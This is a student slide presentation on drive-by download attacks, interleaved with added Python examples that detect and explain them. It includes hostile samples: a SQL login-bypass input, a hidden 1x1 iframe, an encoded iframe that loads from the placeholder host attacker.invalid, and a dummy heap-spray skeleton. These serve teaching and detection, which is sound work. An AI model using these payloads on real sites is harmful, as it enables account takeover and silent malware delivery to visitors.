
Drive by downloads-cns




  1. Drive-By Downloads
     Presenter: Darakhshan Naz
     Teacher: Professor Dr. Muhammad Mubashir Khan
     04.05.2013
  2. Agenda
     • Introduction
     • Mechanisms of Drive-by Download
     • General Detection Approach
     • Security Measures
     • Assessment & Conclusion
  3. What is Drive-by Download?
     • A technique that involves:
       ◦ Intended downloads without understanding the consequences, e.g. executables
       ◦ Unintended downloads, e.g. viruses, spyware
     • Can happen by:
       ◦ Visiting a website
       ◦ Viewing an email message
     • Installs a malicious program, termed malware
       ◦ Through malware, the attacker gets full or partial control of the victim's system
  4. Example Scenario: Drive-By Download! (flattened diagram; steps keep the original numbering; the user is completely unaware of the attack)
     (1) User opens the browser
     (2) Reads an email that contains a website link
     (3) The link attracts the user's interest; the user clicks; the website has many links
     (4) Goes to the website
     (5) Surfs every site but gets bored (no interest develops); closes the website
     (6) Attacker sends the user a spoofed email
     (7) Attacker sends malicious code to the user's browser and exploits a vulnerability
     (8) The malicious code creates a connection between user and attacker
     (9) Downloads and installs its backdoor program
     (10) Steals all the user's important files and leaves him compromised over the network
     Source of concept: report "Defence against Drive-by Download" by the National Security Agency, US
  5. Purpose of Drive-by Download
     • Provide a gateway to botnets.
     • Take advantage of vulnerabilities.
     • Steal personal or confidential information of the user.
     • Lead or redirect the user to other malicious websites and compromise him.
  6. Mechanisms of Drive-by Download
     [Figure: Basic Concept of Drive-by Download Attack (Source: [1]); numbered stages 1 to 4, grouped under Injection and Exploitation]
  7. Injection
     • What is Injection:
       ◦ The act of entering data into an application, bypassing security controls and changing its behaviour in an unexpected way.
     • Reason for Injection:
       ◦ Existence of vulnerabilities.
     • A Drive-by Download is initiated by the injection of malicious code into a database, application or server.
     • Ways of injecting malicious code:
       ◦ Injection through iFrames
       ◦ SQL Injection
       ◦ XPath Injection
  8. How and where to Inject?
     [Figure: a web server and the routes by which malicious code reaches it: SQL Injection, XPath Injection, injection through iFrames, and malware placed directly on the web server]
  9. Injection through iFrames
     • The most basic form of injected code is a malicious iFrame such as:
       Example (the src value is not reproduced on the slide):
         <div style="visibility: hidden; position: absolute; top: 1">
           <iframe id="IFRAME" name="IFRAME" src="…" width="1" height="1"
                   vspace="0" hspace="0" frameborder="0"></iframe>
         </div>
     • This iFrame is present in the HTML of a requested web page.
     • Content from this source renders in an invisible 1 pixel x 1 pixel window.
     • Sometimes iFrames are present in an encoded form that seems normal. The process of encoding is known as "obfuscation".
  10. Obfuscation
     • The process of disguising code through encoding.
     • The previous iFrame can be converted to a JavaScript Unicode string using any encoding tool.
     • Encoding tool: …
     • On browsing the injected page, the JavaScript dynamically generates an iFrame.
     • This causes malicious content from a website controlled by an attacker to execute inside the requested web page.
  11. Obfuscation
     • The obfuscated form of the iFrame is (the encoded string argument is not reproduced here):
         <script type="text/javascript">
           document.write(…);
         </script>
  12. SQL Injection
     • Bypasses the authentication process.
     • Gives a malicious user or attacker access to data.
     • Example: on any user form page, if we enter
         Username: ' OR '1'='1    and    Password: ' OR '1'='1
       then the web page will execute this query:
         SELECT * FROM Users
         WHERE Username = '' OR '1'='1'
         AND Password = '' OR '1'='1'
       The parameters always produce a logically true condition, so the authentication check passes and the attacker can get access to any account in the database.
  13. XPath Injection
     • Almost similar to SQL Injection; now the "target" is an XML document.
     • The insecurity is caused by the injection of an XPath query or conditions through the web page.
     • Example:
       ◦ If a user has an account on a site with Username = John and Password = test123, then logically he will see his own account only.
       ◦ If the same user enters his username as John or 1 = 1 with the same password, the system will authenticate him and show him the entire XML document.
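As an added example that is not part of the presentation, the following Python script reproduces the SQL Injection slide against an in-memory SQLite table and puts the fix beside it. The vulnerable login builds the query by string concatenation exactly as the slide shows; the hardened login binds the same input through `?` placeholders. The table, the account (John / test123), the function names and the always-true input are all constructed for this example. The XPath case on the next slide is structurally the same problem (a quoted string that is pasted into the query), and the mitigation is the same: never splice user input into the query text.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory Users table holding one constructed account (John / test123)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('John', 'test123')")
    conn.commit()
    return conn


def build_concat_query(username: str, password: str) -> str:
    """The query shape from the slide: user input pasted straight into the SQL text."""
    return (f"SELECT * FROM Users WHERE Username = '{username}' "
            f"AND Password = '{password}'")


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Vulnerable login: executes the concatenated query.
    A quote in the input closes the literal and the rest becomes SQL."""
    return conn.execute(build_concat_query(username, password)).fetchall()


def login_param(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Hardened login: '?' placeholders bind the input as data, so quotes and
    OR clauses inside it can never change the structure of the query."""
    query = "SELECT * FROM Users WHERE Username = ? AND Password = ?"
    return conn.execute(query, (username, password)).fetchall()


# The always-true input from the slide, used for both fields.
INJECTION = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print(build_concat_query(INJECTION, INJECTION))
    print("concatenated :", login_concat(conn, INJECTION, INJECTION))  # John's row
    print("parameterised:", login_param(conn, INJECTION, INJECTION))   # []
```

Because `AND` binds tighter than `OR`, the concatenated query reads `Username = '' OR ('1'='1' AND Password = '') OR '1'='1'`, which is true for every row; the parameterised query looks for a user literally named `' OR '1'='1` and finds nothing.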
  14. Mechanism of Drive-by Download
     [Figure: Basic Concept of Drive-by Download Attack (Source: [1]); numbered stages 1 to 4, grouped under Injection and Exploitation]
  15. Exploitation
     • What is Exploitation:
       ◦ The act by an attacker of performing activities on the victim's system at his own will after getting full or partial control.
     • Reasons for Exploitation:
       ◦ Users ignore updates of installed applications.
       ◦ According to Secunia PSI, about 95.46% of users have one or more insecure applications.
       ◦ A newer version may correct one or more vulnerabilities in the installed application.
     • Vulnerabilities that are mostly exploited:
       ◦ Browser vulnerabilities
       ◦ Plugin vulnerabilities
       ◦ File format vulnerabilities
  16. Types of Vulnerabilities
     • Browser vulnerability
       ◦ The attacker injects malicious code into the user's browser and changes its settings without his knowledge.
     • Plugin vulnerability
       ◦ Plugins are provided by third parties and can be vulnerable; this may lead to buffer overflows, memory corruption issues and pointer overwrites.
     • File format vulnerability
       ◦ Attackers attach malware to Word, Excel or PDF files distributed through email or websites. The exploit occurs when the editing program opens them.
  17. General Detection Approach
     • JavaScript-based malware seems difficult to detect and analyze.
     • It requires a comprehensive approach to detect both the root cause and the dynamic behaviour.
     • Specialized detection methods:
       ◦ CUJO [2]: static + dynamic analysis of JavaScript; detection through machine learning.
       ◦ ARROW [8]: creates regular-expression signatures for the servers of a MDN (malware distribution network) and evaluates their effectiveness.
     • Here the generalized detection approach will be discussed, which is the basic idea behind detection.
  18. Step 1: Analysis of JS Redirection
     • For an effective detection approach, analysis of JavaScript is mandatory.
     • The user is victimized in two ways:
       ◦ Either he is directly exposed to a vulnerable site,
       ◦ or an attacker reaches him through a series of redirections.
     • Two approaches can be taken to investigate redirections:
       ◦ Instrumenting the JavaScript code (e.g. hooking document.location).
       ◦ Taking the browser's history.
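To show what "a series of redirections" looks like to an analyst, here is an added Python example (not the presentation's own material) that follows the JavaScript and meta-refresh redirects in a set of page bodies until the chain lands, loops, or exceeds a hop limit. The page bodies, the URLs (which use the reserved `.example` and `.invalid` names) and the function names are all constructed for this example; `fetch` is any callable returning a page body or `None`, so a captured crawl can be plugged in instead of the in-memory dictionary.

```python
import re
from urllib.parse import urljoin, urlsplit

# Redirect forms recognised here (not exhaustive): JavaScript location
# assignments, location.replace()/assign(), and <meta http-equiv="refresh">.
_JS_ASSIGN_RE = re.compile(
    r"""(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=(?!=)\s*(['"])(.*?)\1""")
_JS_CALL_RE = re.compile(r"""location\.(?:replace|assign)\(\s*(['"])(.*?)\1\s*\)""")
_META_REFRESH_RE = re.compile(
    r"""<meta[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["']\s*\d+\s*;\s*url=([^"'>]+)""",
    re.I)


def find_redirect(url: str, body: str):
    """Return the absolute target if the page redirects the browser, else None."""
    for rx in (_JS_ASSIGN_RE, _JS_CALL_RE):
        m = rx.search(body)
        if m:
            return urljoin(url, m.group(2))
    m = _META_REFRESH_RE.search(body)
    if m:
        return urljoin(url, m.group(1).strip())
    return None


def follow_chain(start: str, fetch, max_hops: int = 10):
    """Walk the redirect chain from `start`; fetch(url) returns a body or None.
    Returns (chain, status) with status in {"landed", "loop", "unfetched", "max_hops"}."""
    chain = [start]
    url = start
    for _ in range(max_hops):
        body = fetch(url)
        if body is None:
            return chain, "unfetched"
        nxt = find_redirect(url, body)
        if nxt is None:
            return chain, "landed"
        chain.append(nxt)
        if nxt in chain[:-1]:      # revisiting a URL means the chain cycles
            return chain, "loop"
        url = nxt
    return chain, "max_hops"


def distinct_hosts(chain):
    """Hosts in order of first appearance; hopping across several is a useful signal."""
    seen = []
    for url in chain:
        host = urlsplit(url).hostname
        if host not in seen:
            seen.append(host)
    return seen


# Constructed page bodies keyed by URL; nothing here points at a real site.
PAGES = {
    "http://blog.example/post":
        '<html><body>Read more<script>document.location = "/go?x=1";</script></body></html>',
    "http://blog.example/go?x=1":
        '<html><head><meta http-equiv="refresh" content="0;url=http://ads.example/r"></head></html>',
    "http://ads.example/r":
        '<script>window.location.href = "http://landing.invalid/kit";</script>',
    "http://landing.invalid/kit":
        '<html><body>final page</body></html>',
}

if __name__ == "__main__":
    chain, status = follow_chain("http://blog.example/post", PAGES.get)
    print(status, " -> ".join(chain))
    print("hosts:", distinct_hosts(chain))
```

Running it prints a four-URL chain that crosses three hosts before landing; the same function applied to two pages that redirect to each other stops with status `loop` rather than running forever.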
  19. Step 2: JavaScript Deobfuscation
     • Most malicious JavaScript is in an obfuscated (encoded) form.
     • Deobfuscation (conversion from the complex form to a simple form) can help to identify malicious code.
     • It is possible manually or through an automated tool. Automated tools, e.g.:
       ◦ The developer tools in Google Chrome.
       ◦ Microsoft Script Debugger or Editor.
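The following Python example is added here and is not part of the presentation; it ties slides 9 to 11 (the hidden iFrame and its Unicode-encoded form) to the deobfuscation step above. It first encodes the slide's iFrame into a JavaScript `\uXXXX` string, which is what an encoding tool produces, and then does the analyst's job: it extracts the argument of `document.write(...)`, decodes `\u`, `\x`, `%u` and `%XX` escapes in one pass, and flags iframes that are 1x1 or sit in a `visibility:hidden` / `display:none` block. The markup, the placeholder src (`attacker.invalid`) and all helper names are constructed for this example.

```python
import re

# --- encoding side: what the slide's "encoding tool" outputs -----------------

def to_js_unicode_escapes(text: str) -> str:
    """Encode every character as a JavaScript \\uXXXX escape."""
    return "".join(f"\\u{ord(ch):04x}" for ch in text)


# --- analyst side: decode and inspect ----------------------------------------

_ESCAPE_RE = re.compile(
    r"\\u([0-9a-fA-F]{4})"     # \u003c
    r"|\\x([0-9a-fA-F]{2})"    # \x3c
    r"|%u([0-9a-fA-F]{4})"     # %u003c  (unescape() style)
    r"|%([0-9a-fA-F]{2})"      # %3c
)


def decode_js_string(s: str) -> str:
    """One decoding pass; nested encodings need repeated calls."""
    def _sub(m):
        for group in m.groups():
            if group is not None:
                return chr(int(group, 16))
    return _ESCAPE_RE.sub(_sub, s)


_DOCWRITE_RE = re.compile(r"""document\.write\(\s*(['"])(.*?)\1\s*\)""", re.S)


def deobfuscate_document_writes(script: str) -> list:
    """Decoded argument of every document.write("...") call in a script."""
    return [decode_js_string(m.group(2)) for m in _DOCWRITE_RE.finditer(script)]


_IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
_ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def _dim(value):
    """Parse a width/height attribute such as 1 or 1px; None if absent or non-numeric."""
    try:
        return int(value.strip().rstrip("px"))
    except (ValueError, AttributeError):
        return None


def hidden_iframes(markup: str) -> list:
    """Flag iframes that are 1x1 or smaller, or live in a hidden block (coarse:
    the hidden check looks at the whole decoded fragment, not CSS inheritance)."""
    squashed = re.sub(r"\s+", "", markup.lower())
    hidden_ctx = "visibility:hidden" in squashed or "display:none" in squashed
    findings = []
    for tag in _IFRAME_RE.finditer(markup):
        attrs = {k.lower(): (dq or sq or bare)
                 for k, dq, sq, bare in _ATTR_RE.findall(tag.group(0))}
        w, h = _dim(attrs.get("width")), _dim(attrs.get("height"))
        reasons = []
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append("1x1 or smaller")
        if hidden_ctx:
            reasons.append("inside visibility:hidden / display:none block")
        if reasons:
            findings.append({"src": attrs.get("src", ""), "width": w,
                             "height": h, "reasons": reasons})
    return findings


def analyse(script: str) -> list:
    """Decode every document.write() in the script and report hidden iframes."""
    findings = []
    for markup in deobfuscate_document_writes(script):
        findings.extend(hidden_iframes(markup))
    return findings


# Constructed sample based on the slide's iFrame; the src is a placeholder.
IFRAME_HTML = (
    '<div style="visibility: hidden; position: absolute; top: 1">'
    '<iframe id="IFRAME" name="IFRAME" src="http://attacker.invalid/landing"'
    ' width=1 height=1 frameborder=0></iframe></div>'
)
OBFUSCATED_SCRIPT = ('<script type="text/javascript">document.write("'
                     + to_js_unicode_escapes(IFRAME_HTML) + '");</script>')

if __name__ == "__main__":
    print(OBFUSCATED_SCRIPT[:80] + "...")
    for finding in analyse(OBFUSCATED_SCRIPT):
        print(finding)
```

The obfuscated script contains no literal `<`, `"` or `iframe`, which is why a plain string match on the page source misses it; only after decoding does the 1x1 hidden frame and its src become visible to the checker.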
  20. Step 3: Detection of Memory Corruption
     • Most attacks corrupt memory.
     • The attacker tries to get into the browser and run his shellcode.
       ◦ Shellcode is a small piece of code through which the attacker gets control of the victim's system.
     • The attacker then uses JavaScript to allocate a large number of strings for the shellcode.
     • These strings are not part of the real code; they exist for the attacker's memory allocation.
     • Detection of these strings can give an indication of shellcode.
  21. Contd.
     • Detection of these strings can be done in two ways:
       ◦ Controlling and tracking string variables whenever they are created.
       ◦ For automated detection, the libemu library is used: it scans from each character and, when it finds a sequence of valid instructions, reports shellcode.
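Slides 20 and 21 describe the string-allocation pattern that betrays a heap spray. Here is an added Python example (not from the presentation) implementing the first of the two detection routes, tracking suspicious string variables, as a static scan of JavaScript source: it links long `unescape()` literals (a single escape repeated many times is the classic sled) to the variables they are assigned to, then looks for those variables being doubled in a `while` loop or copied into an array in a `for` loop. The sample JavaScript is a constructed skeleton with dummy bytes, not working exploit code; the thresholds, regular expressions and function names are this example's own assumptions. It deliberately does not do what libemu does (emulating the bytes to find valid instruction sequences), so it is a cheap triage filter, not a replacement for that step.

```python
import re

# var NAME = unescape("%u....%u....")  ->  (name, quote, literal)
_ASSIGN_UNESCAPE_RE = re.compile(
    r"""(\w+)\s*=\s*unescape\(\s*(['"])((?:%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2})+)\2\s*\)""")
_ESC_RE = re.compile(r"%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}")
# while (NAME.length < LIMIT) NAME += NAME;
_DOUBLING_RE = re.compile(
    r"""while\s*\(\s*(\w+)\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)\s*\{?\s*\1\s*\+=\s*\1""")
# for (...) ARR[i] = EXPR;
_ARRAY_FILL_RE = re.compile(r"""for\s*\([^)]*\)\s*\{?\s*(\w+)\s*\[[^\]]+\]\s*=\s*([^;]+);""")


def heap_spray_indicators(js: str, min_escapes: int = 8) -> list:
    """Return indicator dicts {kind, var, count} found in the JavaScript source."""
    indicators = []
    suspect = set()   # variables holding long escape literals
    for name, _quote, literal in _ASSIGN_UNESCAPE_RE.findall(js):
        escapes = _ESC_RE.findall(literal)
        if len(escapes) < min_escapes:
            continue          # short unescape() calls are common in benign code
        suspect.add(name)
        kind = "repeated-escape-sled" if len(set(escapes)) == 1 else "long-unescape-literal"
        indicators.append({"kind": kind, "var": name, "count": len(escapes)})
    for name, limit in _DOUBLING_RE.findall(js):
        if name in suspect:   # only doubling of a suspect string counts
            indicators.append({"kind": "string-doubling-loop", "var": name,
                               "count": int(limit, 0)})
    for arr, expr in _ARRAY_FILL_RE.findall(js):
        used = {v for v in re.findall(r"\w+", expr) if v in suspect}
        if used:              # array filled from suspect strings
            indicators.append({"kind": "array-fill-loop", "var": arr,
                               "count": len(used)})
    return indicators


def is_likely_heap_spray(js: str) -> bool:
    """Verdict: a long escape literal plus a mechanism that multiplies it in memory."""
    kinds = {i["kind"] for i in heap_spray_indicators(js)}
    has_literal = bool(kinds & {"repeated-escape-sled", "long-unescape-literal"})
    has_spray = bool(kinds & {"string-doubling-loop", "array-fill-loop"})
    return has_literal and has_spray


# Constructed skeleton of the pattern the slides describe; dummy bytes only.
SAMPLE_JS = (
    'var sled = unescape("' + "%u9090" * 12 + '");\n'
    'var code = unescape("%u4141%u4242%u4343%u4444%u4545%u4646%u4747%u4848%u4949");\n'
    'while (sled.length < 0x40000) sled += sled;\n'
    'var blocks = new Array();\n'
    'for (var i = 0; i < 200; i++) blocks[i] = sled + code;\n'
)

# Constructed benign script: a short unescape() and an ordinary array loop.
BENIGN_JS = (
    'var greeting = unescape("%48%65%6c%6c%6f");\n'
    'var list = new Array();\n'
    'for (var i = 0; i < 3; i++) list[i] = i * 2;\n'
)

if __name__ == "__main__":
    for ind in heap_spray_indicators(SAMPLE_JS):
        print(ind)
    print("sample :", is_likely_heap_spray(SAMPLE_JS))   # True
    print("benign :", is_likely_heap_spray(BENIGN_JS))   # False
```

Tying the loop checks to variables that already hold a long escape literal is what keeps the benign script clean: a `for` loop that fills an array with numbers, or a five-byte `unescape()` greeting, produces no indicator at all.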
  22. Step 4: Investigation of Exploitation
     • Exploitation is the last step of a Drive-by Download attack and takes advantage of vulnerabilities.
     • It can be detected in two ways:
       ◦ Analysis of the behaviour of browsers and plug-ins.
       ◦ Monitoring of strings passed as parameters and of method calls. Usually long strings are used in exploits, and certain methods are called when downloading malware.
  23. Security Measures
     • Updating of software.
     • Installation of web-filtering software.
     • Implementation of BLADE (Block All Drive-by Download Exploits).
     • Proper management by network administrators.
     • Users should be careful while visiting sites, especially entertainment and social sites, as they may harbour adversaries.
     • Use of reputed search engines like Google, Microsoft, Yahoo, AVG or Bing.
     • Use of a virtual machine for web browsing.
  24. The Good
     • Automated techniques (compiler or library) of deobfuscation are really helpful for the identification of malicious JavaScript.
     • Detection should be focused on central points.
       ◦ Evilseed [11] provides a crawling approach focusing on the central points of malware.
     • Machine learning can provide lightweight JavaScript analysis, fast detection mechanisms and handling of vulnerabilities at runtime.
     • Proper input validation can reduce SQL and XPath injection.
  25. The Bad
     • Can easily happen but is very hard to overcome.
     • The possibilities of attack are rapidly increasing, but validating the detection approaches is not possible every time.
     • A defensive approach is better for fighting these attacks, for two reasons:
       ◦ Intense dynamic behaviour.
       ◦ Complex and time-consuming detection approaches.
  26. The Ugly
     • Mostly shows unexpected behaviour.
     • Due to the diversity of attack methods, it has a high ratio of victims, and it is difficult to design a detection approach that covers all possibilities.
     • No computing device seems to be safe from Drive-by Download.
     • As Drive-by Download attacks are increasing enormously, perhaps in the near future hard drive or portable device vulnerabilities may also exist.
  27. Thanks for your attention
  28. References (1)
     [1] Egele, M., Wurzinger, P., Kirda, E.: Defending Browsers against Drive-by Downloads: Mitigating Heap-Spraying Code Injection Attacks (2009).
     [2] Rieck, K., Krueger, T., Dewald, A.: CUJO: Efficient Detection and Prevention of Drive-by Download Attacks. Technische Universität Berlin.
     [3] Stone-Gross, B., Cova, M., Kruegel, C., Vigna, G.: Peering through the iFrame. University of California; University of Birmingham.
     [4] Westervelt, R.: Kaspersky website hacked (February 2009).
     [5] Cova, M., Kruegel, C., Vigna, G.: Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code. University of California, Santa Barbara. From the ACM Digital Library.
     [6] Interesting statistics from the Secunia PSI (January 2008).
  29. References (2)
     [7] Lu, L., Yegneswaran, V., Porras, P.: BLADE: An Attack-Agnostic Approach for Preventing Drive-By Malware Infections. College of Computing, Georgia Institute of Technology; SRI International. From the ACM Digital Library.
     [8] Zhang, J., Seifert, C., Stokes, J.W., Lee, W.: ARROW: Generating Signatures to Detect Drive-By Downloads. Georgia Institute of Technology; Microsoft Bing; Microsoft Research.
     [9] Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in Web Browsers. Indian Institute of Technology, Guwahati, India.
     [10] Provos, N., Mavrommatis, P., Moheeb, A.R., Monrose, F.: All your iFrames point to us. Google Inc.; Johns Hopkins University.
     [11] Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P.M., Kruegel, C., Vigna, G.: EVILSEED: A Guided Approach to Finding Malicious Web Pages. 2012 IEEE Symposium on Security and Privacy.